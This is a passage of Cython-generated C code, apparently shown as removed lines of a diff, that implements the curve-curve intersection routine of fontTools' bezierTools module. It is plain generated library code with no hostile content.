__PYX_ERR(0, 1310, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_3, __pyx_v_curve2}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1310, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - __pyx_v_bounds2 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1312 - * bounds2 = _curve_bounds(curve2) - * - * if not range1: # <<<<<<<<<<<<<< - * range1 = (0.0, 1.0) - * if not range2: - */ - __pyx_t_5 = __Pyx_PyObject_IsTrue(__pyx_v_range1); if (unlikely((__pyx_t_5 < 0))) __PYX_ERR(0, 1312, __pyx_L1_error) - __pyx_t_6 = (!__pyx_t_5); - if (__pyx_t_6) { - - /* "fontTools/misc/bezierTools.py":1313 - * - * if not range1: - * range1 = (0.0, 1.0) # <<<<<<<<<<<<<< - * if not range2: - * range2 = (0.0, 1.0) - */ - __Pyx_INCREF(__pyx_tuple__5); - __Pyx_DECREF_SET(__pyx_v_range1, __pyx_tuple__5); - - /* "fontTools/misc/bezierTools.py":1312 - * bounds2 = _curve_bounds(curve2) - * - * if not range1: # <<<<<<<<<<<<<< - * range1 = (0.0, 1.0) - * if not range2: - */ - } - - /* "fontTools/misc/bezierTools.py":1314 - * if not range1: - * range1 = (0.0, 1.0) - * if not range2: # <<<<<<<<<<<<<< - * range2 = (0.0, 1.0) - * - */ - __pyx_t_6 = __Pyx_PyObject_IsTrue(__pyx_v_range2); if (unlikely((__pyx_t_6 < 0))) __PYX_ERR(0, 1314, __pyx_L1_error) - __pyx_t_5 = (!__pyx_t_6); - if (__pyx_t_5) { - - /* "fontTools/misc/bezierTools.py":1315 - * range1 = (0.0, 1.0) - * if not range2: - * range2 = (0.0, 1.0) # <<<<<<<<<<<<<< - * - * # If bounds don't intersect, go home - */ - __Pyx_INCREF(__pyx_tuple__5); - __Pyx_DECREF_SET(__pyx_v_range2, __pyx_tuple__5); - - /* "fontTools/misc/bezierTools.py":1314 - * if not range1: - * range1 = (0.0, 1.0) - * if not range2: # <<<<<<<<<<<<<< - * range2 = (0.0, 1.0) - * - */ - } - - /* "fontTools/misc/bezierTools.py":1318 - * - * # If bounds don't intersect, go home - * intersects, _ = sectRect(bounds1, bounds2) # <<<<<<<<<<<<<< - * if not intersects: - * return [] - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_sectRect); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1318, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_3, __pyx_v_bounds1, __pyx_v_bounds2}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 2+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1318, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - if ((likely(PyTuple_CheckExact(__pyx_t_1))) || (PyList_CheckExact(__pyx_t_1))) { - PyObject* sequence = __pyx_t_1; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 1318, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_3 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_3 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1318, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1318, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - #endif - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - } else { - Py_ssize_t index = -1; - __pyx_t_7 = PyObject_GetIter(__pyx_t_1); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 1318, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_8 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_7); - index = 0; __pyx_t_2 = __pyx_t_8(__pyx_t_7); if (unlikely(!__pyx_t_2)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - index = 1; __pyx_t_3 = __pyx_t_8(__pyx_t_7); if (unlikely(!__pyx_t_3)) goto __pyx_L5_unpacking_failed; - __Pyx_GOTREF(__pyx_t_3); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_8(__pyx_t_7), 2) < 0) __PYX_ERR(0, 1318, __pyx_L1_error) - __pyx_t_8 = NULL; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - goto __pyx_L6_unpacking_done; - __pyx_L5_unpacking_failed:; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - __pyx_t_8 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 1318, __pyx_L1_error) - __pyx_L6_unpacking_done:; - } - __pyx_v_intersects = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v__ = __pyx_t_3; - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1319 - * # If bounds don't intersect, go home - * intersects, _ = sectRect(bounds1, bounds2) - * if not intersects: # <<<<<<<<<<<<<< - * return [] - * - */ - __pyx_t_5 = __Pyx_PyObject_IsTrue(__pyx_v_intersects); if (unlikely((__pyx_t_5 < 0))) __PYX_ERR(0, 1319, __pyx_L1_error) - __pyx_t_6 = (!__pyx_t_5); - if (__pyx_t_6) { - - /* "fontTools/misc/bezierTools.py":1320 - * intersects, _ = sectRect(bounds1, bounds2) - * if not intersects: - * return [] # <<<<<<<<<<<<<< - * - * def midpoint(r): - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = PyList_New(0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1320, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1319 - * # If bounds don't intersect, go home - * intersects, _ = sectRect(bounds1, bounds2) - * if not intersects: # <<<<<<<<<<<<<< - * return [] - * - */ - } - - /* "fontTools/misc/bezierTools.py":1322 - * return [] - * - * def midpoint(r): # <<<<<<<<<<<<<< - * return 0.5 * (r[0] + r[1]) - * - */ - __pyx_t_1 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_28_curve_curve_intersections_t_1midpoint, 0, __pyx_n_s_curve_curve_intersections_t_loc, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__7)); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1322, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_v_midpoint = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1326 - * - * # If they do overlap but they're tiny, approximate - * if rectArea(bounds1) < precision and rectArea(bounds2) < precision: # <<<<<<<<<<<<<< - * return [(midpoint(range1), midpoint(range2))] - * - */ - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_rectArea); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1326, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_3))) { - __pyx_t_2 = PyMethod_GET_SELF(__pyx_t_3); - if (likely(__pyx_t_2)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_3, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_2, __pyx_v_bounds1}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1326, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - __pyx_t_3 = PyObject_RichCompare(__pyx_t_1, __pyx_cur_scope->__pyx_v_precision, Py_LT); __Pyx_XGOTREF(__pyx_t_3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1326, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_5 = __Pyx_PyObject_IsTrue(__pyx_t_3); if (unlikely((__pyx_t_5 < 0))) __PYX_ERR(0, 1326, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - if (__pyx_t_5) { - } else { - __pyx_t_6 = __pyx_t_5; - goto __pyx_L9_bool_binop_done; - } - __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_rectArea); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1326, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_1))) { - __pyx_t_2 = PyMethod_GET_SELF(__pyx_t_1); - if (likely(__pyx_t_2)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_1, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_2, __pyx_v_bounds2}; - __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_4, 1+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; - if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1326, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - } - __pyx_t_1 = PyObject_RichCompare(__pyx_t_3, __pyx_cur_scope->__pyx_v_precision, Py_LT); __Pyx_XGOTREF(__pyx_t_1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1326, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_5 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_5 < 0))) __PYX_ERR(0, 1326, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_6 = __pyx_t_5; - __pyx_L9_bool_binop_done:; - if (__pyx_t_6) { - - /* "fontTools/misc/bezierTools.py":1327 - * # If they do overlap but they're tiny, approximate - * if rectArea(bounds1) < precision and rectArea(bounds2) < precision: - * return [(midpoint(range1), midpoint(range2))] # <<<<<<<<<<<<<< - * - * c11, c12 = _split_segment_at_t(curve1, 0.5) - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = __pyx_pf_9fontTools_4misc_11bezierTools_28_curve_curve_intersections_t_midpoint(__pyx_v_midpoint, __pyx_v_range1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1327, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_3 = __pyx_pf_9fontTools_4misc_11bezierTools_28_curve_curve_intersections_t_midpoint(__pyx_v_midpoint, __pyx_v_range2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1327, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = PyTuple_New(2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1327, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 0, __pyx_t_1)) __PYX_ERR(0, 1327, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 1, __pyx_t_3)) __PYX_ERR(0, 1327, __pyx_L1_error); - __pyx_t_1 = 0; - __pyx_t_3 = 0; - __pyx_t_3 = PyList_New(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1327, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyList_SET_ITEM(__pyx_t_3, 0, __pyx_t_2)) __PYX_ERR(0, 1327, __pyx_L1_error); - __pyx_t_2 = 0; - __pyx_r = __pyx_t_3; - __pyx_t_3 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":1326 - * - * # If they do overlap but they're tiny, approximate - * if rectArea(bounds1) < precision and rectArea(bounds2) < precision: # <<<<<<<<<<<<<< - * return [(midpoint(range1), midpoint(range2))] - * - */ - } - - /* "fontTools/misc/bezierTools.py":1329 - * return [(midpoint(range1), midpoint(range2))] - * - * c11, c12 = _split_segment_at_t(curve1, 0.5) # <<<<<<<<<<<<<< - * c11_range = (range1[0], midpoint(range1)) - * c12_range = (midpoint(range1), range1[1]) - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_split_segment_at_t); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1329, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_1)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_1, __pyx_v_curve1, __pyx_float_0_5}; - __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 2+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; - if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1329, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - if ((likely(PyTuple_CheckExact(__pyx_t_3))) || (PyList_CheckExact(__pyx_t_3))) { - PyObject* sequence = __pyx_t_3; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 1329, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_1 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_1); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1329, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1329, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - #endif - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } else { - Py_ssize_t index = -1; - __pyx_t_7 = PyObject_GetIter(__pyx_t_3); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 1329, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_8 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_7); - index = 0; __pyx_t_2 = __pyx_t_8(__pyx_t_7); if (unlikely(!__pyx_t_2)) goto __pyx_L11_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - index = 1; __pyx_t_1 = __pyx_t_8(__pyx_t_7); if (unlikely(!__pyx_t_1)) goto __pyx_L11_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_8(__pyx_t_7), 2) < 0) __PYX_ERR(0, 1329, __pyx_L1_error) - __pyx_t_8 = NULL; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - goto __pyx_L12_unpacking_done; - __pyx_L11_unpacking_failed:; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - __pyx_t_8 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 1329, __pyx_L1_error) - __pyx_L12_unpacking_done:; - } - __pyx_v_c11 = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_c12 = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1330 - * - * c11, c12 = _split_segment_at_t(curve1, 0.5) - * c11_range = (range1[0], midpoint(range1)) # <<<<<<<<<<<<<< - * c12_range = (midpoint(range1), range1[1]) - * - */ - __pyx_t_3 = __Pyx_GetItemInt(__pyx_v_range1, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1330, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_1 = __pyx_pf_9fontTools_4misc_11bezierTools_28_curve_curve_intersections_t_midpoint(__pyx_v_midpoint, __pyx_v_range1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1330, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyTuple_New(2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1330, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 0, __pyx_t_3)) __PYX_ERR(0, 1330, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 1, __pyx_t_1)) __PYX_ERR(0, 1330, __pyx_L1_error); - __pyx_t_3 = 0; - __pyx_t_1 = 0; - __pyx_v_c11_range = ((PyObject*)__pyx_t_2); - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1331 - * c11, c12 = _split_segment_at_t(curve1, 0.5) - * c11_range = (range1[0], midpoint(range1)) - * c12_range = (midpoint(range1), range1[1]) # <<<<<<<<<<<<<< - * - * c21, c22 = _split_segment_at_t(curve2, 0.5) - */ - __pyx_t_2 = __pyx_pf_9fontTools_4misc_11bezierTools_28_curve_curve_intersections_t_midpoint(__pyx_v_midpoint, __pyx_v_range1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1331, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_range1, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1331, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1331, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_2)) __PYX_ERR(0, 1331, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_1)) __PYX_ERR(0, 1331, __pyx_L1_error); - __pyx_t_2 = 0; - __pyx_t_1 = 0; - __pyx_v_c12_range = ((PyObject*)__pyx_t_3); - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1333 - * c12_range = (midpoint(range1), range1[1]) - * - * c21, c22 = _split_segment_at_t(curve2, 0.5) # <<<<<<<<<<<<<< - * c21_range = (range2[0], midpoint(range2)) - * c22_range = (midpoint(range2), range2[1]) - */ - __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_split_segment_at_t); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1333, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_1))) { - __pyx_t_2 = PyMethod_GET_SELF(__pyx_t_1); - if (likely(__pyx_t_2)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_1, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[3] = {__pyx_t_2, __pyx_v_curve2, __pyx_float_0_5}; - __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_4, 2+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; - if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1333, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - } - if ((likely(PyTuple_CheckExact(__pyx_t_3))) || (PyList_CheckExact(__pyx_t_3))) { - PyObject* sequence = __pyx_t_3; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 2)) { - if (size > 2) __Pyx_RaiseTooManyValuesError(2); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 1333, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_1 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 1); - } else { - __pyx_t_1 = PyList_GET_ITEM(sequence, 0); - __pyx_t_2 = PyList_GET_ITEM(sequence, 1); - } - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(__pyx_t_2); - #else - __pyx_t_1 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1333, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1333, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } else { - Py_ssize_t index = -1; - __pyx_t_7 = PyObject_GetIter(__pyx_t_3); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 1333, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_8 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_7); - index = 0; __pyx_t_1 = __pyx_t_8(__pyx_t_7); if (unlikely(!__pyx_t_1)) goto __pyx_L13_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - index = 1; __pyx_t_2 = __pyx_t_8(__pyx_t_7); if (unlikely(!__pyx_t_2)) goto __pyx_L13_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_8(__pyx_t_7), 2) < 0) __PYX_ERR(0, 1333, __pyx_L1_error) - __pyx_t_8 = NULL; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - goto __pyx_L14_unpacking_done; - __pyx_L13_unpacking_failed:; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - __pyx_t_8 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 1333, __pyx_L1_error) - __pyx_L14_unpacking_done:; - } - __pyx_v_c21 = __pyx_t_1; - __pyx_t_1 = 0; - __pyx_v_c22 = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":1334 - * - * c21, c22 = _split_segment_at_t(curve2, 0.5) - * c21_range = (range2[0], midpoint(range2)) # <<<<<<<<<<<<<< - * c22_range = (midpoint(range2), range2[1]) - * - */ - __pyx_t_3 = __Pyx_GetItemInt(__pyx_v_range2, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1334, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = __pyx_pf_9fontTools_4misc_11bezierTools_28_curve_curve_intersections_t_midpoint(__pyx_v_midpoint, __pyx_v_range2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1334, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PyTuple_New(2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1334, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_t_3)) __PYX_ERR(0, 1334, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_t_2)) __PYX_ERR(0, 1334, __pyx_L1_error); - __pyx_t_3 = 0; - __pyx_t_2 = 0; - __pyx_v_c21_range = ((PyObject*)__pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":1335 - * c21, c22 = _split_segment_at_t(curve2, 0.5) - * c21_range = (range2[0], midpoint(range2)) - * c22_range = (midpoint(range2), range2[1]) # <<<<<<<<<<<<<< - * - * found = [] - */ - __pyx_t_1 = __pyx_pf_9fontTools_4misc_11bezierTools_28_curve_curve_intersections_t_midpoint(__pyx_v_midpoint, __pyx_v_range2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 1335, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __Pyx_GetItemInt(__pyx_v_range2, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1335, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1335, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_1)) __PYX_ERR(0, 1335, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_t_2)) __PYX_ERR(0, 1335, __pyx_L1_error); - __pyx_t_1 = 0; - __pyx_t_2 = 0; - __pyx_v_c22_range = ((PyObject*)__pyx_t_3); - __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1337 - * c22_range = (midpoint(range2), range2[1]) - * - * found = [] # <<<<<<<<<<<<<< - * found.extend( - * _curve_curve_intersections_t( - */ - __pyx_t_3 = PyList_New(0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1337, __pyx_L1_error) 